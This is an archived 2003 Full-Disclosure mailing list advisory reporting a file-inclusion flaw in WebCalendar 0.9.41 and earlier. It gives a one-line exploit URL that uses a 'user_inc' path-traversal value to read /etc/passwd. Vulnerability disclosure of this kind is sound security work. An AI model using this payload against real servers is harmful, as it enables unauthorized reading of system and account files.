[Full-Disclosure] WebCalendar Include File

• Previous message: morning_wood: "[Full-Disclosure] Fw: Fake Advisory"
• Next in thread: Emmanuel Lacour: "Re: WebCalendar Include File"
• Reply: Emmanuel Lacour: "Re: WebCalendar Include File"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Webcalendar 0.9.41 and below.
http://webcalendar.sourceforge.net/

  Since this appears to be public info now. 

Problem: 
  http://sourceforge.net/forum/forum.php?thread_id=901234&forum_id=11588

Exploit:
  http://www.some.host/webcalendar/[filename].php?user_inc=../../../../../etc/passwd   


- nocon
http://nocon.darkflame.net/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

• Next message: obscure: "CGI.pm vulnerable to Cross-site Scripting"
• Previous message: morning_wood: "[Full-Disclosure] Fw: Fake Advisory"
• Next in thread: Emmanuel Lacour: "Re: WebCalendar Include File"
• Reply: Emmanuel Lacour: "Re: WebCalendar Include File"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sun Jul 20 2003 - 18:44:01 PDT